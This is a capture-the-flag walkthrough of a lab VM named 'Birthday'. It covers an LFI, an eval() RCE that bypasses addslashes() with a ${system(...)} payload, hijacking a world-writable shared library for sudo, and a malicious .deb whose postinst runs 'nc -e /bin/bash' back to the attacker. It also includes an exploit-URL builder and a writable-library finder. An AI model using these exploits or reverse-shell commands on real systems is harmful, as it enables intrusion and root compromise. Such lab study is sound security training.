Difficulty: Hard
Kali: 192.168.56.104
Target: 192.168.56.149
Information gathering
Port scan
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 10:39 CST
Nmap scan report for 192.168.56.149
Host is up (0.00016s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:E8:95:BE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
Good news: the port surface is small, only 22 (ssh) and 80 (http) are open.
Directory scan
┌──(root㉿kali2)-[~/Desktop]
└─# gobuster dir -u http://192.168.56.149 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.149
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,html,txt,php,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.hta.zip (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/.hta.bak (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.bak (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htaccess.zip (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/.htpasswd.bak (Status: 403) [Size: 279]
/.htpasswd.zip (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/index.php (Status: 302) [Size: 1197] [--> /index.php?event=birthday&date=3881678400]
/server-status (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================
Looking at the web app
Nothing of interest in the page source, only a single image; steganography analysis on it turned up nothing hidden, so the URL parameters are the only lead left.
After some trial and error, changing the date parameter to birthday redirected to birthday_party_program.php.
Clicking through each link, one of them looked like a possible LFI.
Clicking "here" further down also redirects to a birthday-calculator URL.
Guessing that the calculator might execute commands, I used the LFI to read its source.
RCE
http://192.168.56.149/birthday_party_program.php?page=/var/www/html/birthday_calculator.php
<?php
if (isset($_GET['dob'])) {
    $dob = addslashes($_GET['dob']);
    eval("\$dob = \"$dob\";");
    $now = new DateTime();
    $nextBirthday = new DateTime($dob);
    $nextBirthday->setDate($now->format('Y'), $nextBirthday->format('m'), $nextBirthday->format('d'));
    if($nextBirthday < $now) {
        $nextBirthday->modify('+1 year');
    }
    $interval = $now->diff($nextBirthday);
    echo "<p>Your next birthday is in: ".$interval->days." days!</p>";
}
?>
User input goes through addslashes() and then straight into eval() inside a double-quoted string. addslashes() only backslash-escapes single quotes, double quotes, backslashes and NUL; it leaves $, {, }, ( and ) alone, so a value using PHP's complex (curly) variable syntax such as ${...} is still interpolated, and the expression inside it is executed when eval() parses the string. Searching turned up an article on exactly this pattern:
"Using complex variable syntax to bypass addslashes() and get RCE in eval('$str="'.addslashes($str).'";')" (CSDN blog)
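To make the bypass concrete, here is an added Python model (not code from this post or from the CSDN article) of what birthday_calculator.php does to the dob parameter: it reimplements PHP's addslashes(), shows the exact string eval() receives for a quote-based payload versus a ${...} payload, builds the resulting GET URL, and includes the whitelist check a fixed version would use instead of eval(). The payload ${system($_GET[0])} and the use of parameter 0 to carry the command (a numeric key needs no quotes, which addslashes() would mangle) are this example's choices; the post does not show the payload it actually used.

```python
"""
Model of the addslashes()+eval() pattern in birthday_calculator.php.
Shows which bytes addslashes() escapes and why ${...} still reaches eval().
Added example; payloads below are constructed for illustration.
"""
import re
from urllib.parse import urlencode

# Quote-based injection: needs a closing '"', which addslashes() escapes.
NAIVE_PAYLOAD = '"; system(\'id\'); //'
# Complex-syntax injection: no quote, no backslash, so it is passed through
# untouched and the function call runs when the string is interpolated.
BYPASS_PAYLOAD = "${system($_GET[0])}"


def php_addslashes(s: str) -> str:
    """Reimplementation of PHP addslashes(): prefix ' " \\ and NUL with a
    backslash. Every other character, including $ { } ( ) [ ] ;, passes."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def eval_string(dob: str) -> str:
    """The exact PHP source eval() receives for a dob value, i.e. the result
    of eval("\\$dob = \\"$dob\\";") after addslashes()."""
    return '$dob = "' + php_addslashes(dob) + '";'


def survives_addslashes(payload: str) -> bool:
    """True when addslashes() returns the payload unchanged."""
    return php_addslashes(payload) == payload


def exploit_url(base: str, cmd: str) -> str:
    """GET URL: dob carries ${system($_GET[0])}, parameter 0 carries the
    command to run. (Assumed layout: the page does not show its payload.)"""
    return base + "?" + urlencode({"dob": BYPASS_PAYLOAD, "0": cmd})


DOB_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def safe_dob(dob: str) -> bool:
    """Hardened check: whitelist a date format and never hand user input to
    eval(). In PHP, DateTime::createFromFormat('Y-m-d', $dob) replaces the
    eval() line entirely."""
    return bool(DOB_RE.match(dob))


if __name__ == "__main__":
    for p in (NAIVE_PAYLOAD, BYPASS_PAYLOAD):
        print(f"{p!r:30} survives={survives_addslashes(p)!s:5} "
              f"eval sees: {eval_string(p)}")
    print(exploit_url("http://192.168.56.149/birthday_calculator.php", "id"))
```

Run it without arguments to see both eval strings side by side; the quote-based payload ends up as an inert string literal, while the ${...} one is syntactically a variable-variable whose name is computed by calling system(). PHP 8.2 deprecates the ${expr} form but still executes it.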
Reverse shell
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 50338
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@birthday:/var/www/html$
Privilege escalation: user
sudo -l
/home contains a single user, chloe, whose directory is not accessible; sudo -l, however, shows a way to escalate.
www-data@birthday:/var/www$ cd /home
cd /home
www-data@birthday:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 28 2023 .
drwxr-xr-x 18 root root 4096 Jul 14 2023 ..
drwx------ 4 chloe chloe 4096 Jul 14 2023 chloe
www-data@birthday:/home$ cd chloe
cd chloe
bash: cd: chloe: Permission denied
www-data@birthday:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on birthday:
(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/home$ zodiac
zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
Your Zodiac sign is: Capricorn
It is a zodiac-sign calculator. Check its permissions:
www-data@birthday:/usr/bin$ ls -al ./zodiac
ls -al ./zodiac
-rwxr-xr-x 1 root root 16056 Jun 29 2023 ./zodiac
Owned by root and not writable, so the remaining angle is the shared libraries it loads.
Shared library hijacking
www-data@birthday:/usr/bin$ ldd ./zodiac
ldd ./zodiac
linux-vdso.so.1 (0x00007ffed7d85000)
libzodiac.so => /lib/x86_64-linux-gnu/libzodiac.so (0x00007f8d26467000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8d26286000)
/lib64/ld-linux-x86-64.so.2 (0x00007f8d26477000)
The only candidate is libzodiac.so; check its permissions:
www-data@birthday:/usr/bin$ ls -al /lib/x86_64-linux-gnu/libzodiac.so
ls -al /lib/x86_64-linux-gnu/libzodiac.so
-rwxr-xrwx 1 root root 15096 Jul 6 2022 /lib/x86_64-linux-gnu/libzodiac.so
Mode -rwxr-xrwx: the library is world-writable, so it can be overwritten. That on-disk write is what makes the hijack possible here; sudo does not pass LD_PRELOAD or LD_LIBRARY_PATH through to the target, so environment-based library injection is not an option.
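As an added helper (not part of the original post), the following Python script generalises the ldd / ls -al check above: it parses ldd output for a target binary and reports every dependency the current user could replace, either because the library file itself is writable or because its directory is, which also allows replacement by unlink-and-recreate even when the file mode looks safe. The sample ldd output embedded in it is copied from the run above; the default binary path is only a default.

```python
"""
Report shared libraries of a binary that the current user could replace.
Added example for this walkthrough; SAMPLE_LDD is the page's ldd ./zodiac output.
"""
import os
import re
import subprocess
import sys

# "soname => /resolved/path (0xaddr)"; the vDSO and loader lines have no "=>".
LDD_LINE = re.compile(r"^\s*(\S+)\s+=>\s+(/\S+)\s+\(0x[0-9a-f]+\)\s*$")

SAMPLE_LDD = """\
\tlinux-vdso.so.1 (0x00007ffed7d85000)
\tlibzodiac.so => /lib/x86_64-linux-gnu/libzodiac.so (0x00007f8d26467000)
\tlibc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f8d26286000)
\t/lib64/ld-linux-x86-64.so.2 (0x00007f8d26477000)
"""


def parse_ldd(output: str) -> dict:
    """Map soname -> resolved path for every '=>' line of ldd output."""
    libs = {}
    for line in output.splitlines():
        m = LDD_LINE.match(line)
        if m:
            libs[m.group(1)] = m.group(2)
    return libs


def default_can_write(path: str) -> bool:
    """Replaceable if the file is writable, or its directory is (unlink + recreate)."""
    return os.access(path, os.W_OK) or os.access(os.path.dirname(path), os.W_OK)


def hijackable(libs: dict, can_write=default_can_write) -> dict:
    """Subset of libs whose on-disk file we could swap for our own .so."""
    return {name: path for name, path in libs.items() if can_write(path)}


def main(binary: str) -> int:
    out = subprocess.run(["ldd", binary], capture_output=True,
                         text=True, check=True).stdout
    targets = hijackable(parse_ldd(out))
    for name, path in targets.items():
        print(f"[!] {name} -> {path} is replaceable by uid {os.getuid()}")
    if not targets:
        print("[-] no replaceable libraries")
    return 0 if targets else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv[1] if len(sys.argv) > 1 else "/usr/bin/zodiac"))
```

Run it as the low-privileged user against each sudo target; libraries under /usr/lib are normally root-owned and 0644 or 0755, so anything it reports is a misconfiguration worth a finding on its own.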
www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
int main(){
system("/bin/bash");
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on birthday:
(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
/usr/bin/zodiac: symbol lookup error: /usr/bin/zodiac: undefined symbol: get_zodiac_sign
A minimal .so gives a symbol lookup error: the binary imports get_zodiac_sign from libzodiac.so, so the replacement must export that symbol. Its body and return type hardly matter because system() runs before the caller ever looks at the result; a function marked __attribute__((constructor)) would even run at load time without having to match the real signature at all.
www-data@birthday:/tmp$ cat a.c
cat a.c
#include <stdlib.h>
/* Symbol the zodiac binary imports from libzodiac.so; under sudo it runs as chloe */
int get_zodiac_sign()
{
    system("/bin/bash");
    return 0;
}
int main(){
    get_zodiac_sign();
}
www-data@birthday:/tmp$ gcc -shared a.c -o a.so
gcc -shared a.c -o a.so
www-data@birthday:/tmp$ cp a.so /lib/x86_64-linux-gnu/libzodiac.so
cp a.so /lib/x86_64-linux-gnu/libzodiac.so
www-data@birthday:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on birthday:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User www-data may run the following commands on birthday:
(chloe) NOPASSWD: /usr/bin/zodiac
www-data@birthday:/tmp$ sudo -u chloe /usr/bin/zodiac
sudo -u chloe /usr/bin/zodiac
Please enter your birth month (1-12): 1
1
Please enter your birth day (1-31): 1
1
chloe@birthday:/tmp$ id
id
uid=1001(chloe) gid=1001(chloe) groups=1001(chloe)
chloe@birthday:/tmp$
Got a shell as chloe.
Privilege escalation: root
There is a root-owned script in /opt, next to a packages directory that is world-writable (drwxr-xrwx):
chloe@birthday:/opt$ ls -al
ls -al
total 16
drwxr-xr-x+ 3 root root 4096 Jul 14 2023 .
drwxr-xr-x 18 root root 4096 Jul 14 2023 ..
drwxr-xrwx 2 root root 4096 Jul 2 2023 packages
-rwxr-xr-x 1 root root 357 Jul 2 2023 script.sh
chloe@birthday:/opt$ cat script.sh
cat script.sh
#!/bin/bash
URL="http://ipv4.download.thinkbroadband.com/50MB.zip"
FILE="50MB.zip"
if [ -f "$FILE" ]; then
    rm "$FILE"
fi
START=$(date +%s.%N)
wget -O $FILE $URL
END=$(date +%s.%N)
DIFF=$(echo "$END - $START" | bc)
SIZE=$(du -b $FILE | cut -f1)
SPEED=$(echo "scale=2; ($SIZE*8/1000000)/$DIFF" | bc)
echo "Download speed : $SPEED Mbps"
rm "$FILE"
It times the download of a file from a hard-coded URL and prints the speed; the script itself is root-owned and not writable.
Check what runs periodically with pspy64.
pspy64 shows root running /usr/bin/ansible-playbook /etc/ansible/install.yml on a schedule:
2024/04/06 05:41:09 CMD: UID=0 PID=25666 | /usr/bin/python3 /usr/bin/ansible-playbook /etc/ansible/install.yml
chloe@birthday:~$ ls -al /etc/ansible/install.yml
ls -al /etc/ansible/install.yml
-rw-r--r-- 1 root root 1174 Jul 13 2023 /etc/ansible/install.yml
chloe@birthday:~$ cat /etc/ansible/install.yml
cat /etc/ansible/install.yml
- hosts: clients
  tasks:
    - name: Run script /opt/script.sh
      ansible.builtin.command: /opt/script.sh
    - name: Install debian packages
      ansible.builtin.apt:
        deb: "/opt/packages/{{ item }}"
      loop:
        - abigail-doc_2.2-2_all.deb
        - airspy_1.0.10-2+b1_amd64.deb
        - aobook_1.0.3-3_amd64.deb
        - auto-07p_0.9.2+dfsg-3+b3_amd64.deb
        - bacula-console_9.6.7-7_amd64.deb
    - name: Copy /var/www/html to /var/backup/site.zip
      ansible.builtin.archive:
        path: /var/www/html
        dest: /var/backup/site.zip
    - name: Check who is connected
      ansible.builtin.shell: who > /tmp/who.txt
    - name: Add entry in /etc/hosts
      ansible.builtin.lineinfile:
        path: /etc/hosts
        line: "127.0.0.1 localhost.me"
    - name: Install apt package
      ansible.builtin.apt:
        name: htop
        state: present
    - name: Install netdata
      ansible.builtin.apt:
        name: netdata
        state: present
    - name: Run netdata service
      ansible.builtin.systemd:
        name: netdata
        enabled: yes
        state: started
This is an Ansible playbook in YAML format. It:
1. runs /opt/script.sh
2. installs the Debian packages listed under /opt/packages/
3. archives /var/www/html into /var/backup/site.zip
4. runs who and writes the output to /tmp/who.txt
5. maps 127.0.0.1 to localhost.me in /etc/hosts
6. installs htop and netdata and enables the netdata service
The playbook runs as root and /opt/packages is world-writable, so the route is to replace one of the listed .deb files with a package whose postinst maintainer script spawns a reverse shell: dpkg runs maintainer scripts as root while installing, and the apt module installs these local files without any signature check.
I didn't know how to do this part, so I looked at the writeup.
chloe@birthday:/dev/shm$ mkdir deb
chloe@birthday:/dev/shm$ cd deb
chloe@birthday:/dev/shm/deb$ mkdir -p package/DEBIAN
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ touch package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ nano package/DEBIAN/control
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/postinst
nc -e /bin/bash 192.168.56.104 4444
chloe@birthday:/dev/shm/deb$ cat package/DEBIAN/control
Package: revshell
Version: 1.0
Architecture: all
Description: revshell
Maintainer: crom
chloe@birthday:/dev/shm/deb$ chmod +x package/DEBIAN/postinst
chloe@birthday:/dev/shm/deb$ dpkg-deb --build package
chloe@birthday:/dev/shm/deb$ mv package.deb /opt/packages/aobook_1.0.3-3_amd64.deb
replace '/opt/packages/aobook_1.0.3-3_amd64.deb', overriding mode 0644 (rw-r--r--)? y
Start a listener on Kali and the root shell comes back on the next playbook run:
┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.149] 51688
uid=0(root) gid=0(root) groups=0(root)
cat /root/r*